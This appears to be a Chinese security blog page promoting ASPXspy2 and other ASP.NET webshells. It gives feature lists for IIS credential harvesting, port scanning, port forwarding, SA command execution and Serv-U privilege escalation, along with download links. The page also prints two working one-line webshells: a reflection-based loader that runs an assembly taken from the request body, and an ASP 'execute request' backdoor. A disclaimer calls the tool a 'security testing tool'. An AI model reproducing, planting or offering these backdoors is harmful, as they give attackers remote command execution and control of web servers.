作者:Bin
1.开发环境VS2008 + C#,兼容FrameWork1.1/2.0,基本实现代码分离,CSS方便参考了phpspy。
2.密码为32位MD5加密(小写) 默认为 admin.
3.全部采用POST方式提交数据,增强了隐蔽性。
4.增强了IIS探测功能,遍历IIS站点信息,绝对路径,多域名绑定,以及IIS账号密码。
5.增加了对指定文件的搜索功能。
6.修正了一些数据库操作的BUG。
7.增强了对注册表的读取,此部分由BloodSword完成,在此感谢。
8.修正了对端口的多线程扫描
9.增强了端口转发功能,参考了Cnqing的一些代码,在此感谢。
免责声明:此工具为安全检测工具,任何人使用此工具,做违法国家法律的事情,责任自负!
联系方式:E-mail:[email protected] Blog:www.rootkit.net.cn
下载地址:ASPXspy2.rar
# 鬼仔:备份地址
Tags: ASP.Net, ASPXspy, WebShell鬼仔注:刚从外面回来,看到cnqing在gtalk上给我的留言,只扔给一个链接。
作者:cnqing
软件说明:
程序包 包括一个基于反射的.net 一句话木马。
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>客户端 当前插件
文件管理
.net探针
CMDshell
端口转发
阅读全文 »
作者:Bin
来源:Bin-Blog
Readme:
1.开发环境VS2005 + C#,兼容FrameWork1.1/2.0,基本实现代码分离。
2.密码为32位MD5加密(小写) 默认为 admin.
3.采用POST方式提交数据,增强了隐蔽性。
4.添加了IIS探测功能,遍历IIS站点信息。
5.增强了对文件属性的修改。
6.在SQLTools中增加了,SA权限执行系统命令功能,SQL_DIR 功能,可以直接备份log/database,到指定目录。
文件名为bin.asp Shell 为<%execute request(“B”)%>
7.增加了 Serv-u 提权功能.
8.可以对端口实现单线程扫描。
9.可以对注册表进行简单的读取.
阅读全文 »
来源:無名氏
没什么好说的了吧!
之前写了个 JSP的 现在找个ASPX的实现了!
还给自己一个心愿~~
说起来也真头疼ASPX跟 JSP/SERVLET的生命周期 不一样~
ASPX页面的对象浏览完了自动会销毁…
而JSP/SERLVET的是通过容器反射调用对象的service方法~
所以页面的成员属性不会释放!ASPX则不同了!
所以没办法只能使用类里面的静态成员靠!
先看看下面图片吧!
代码:article_1281_code.txt
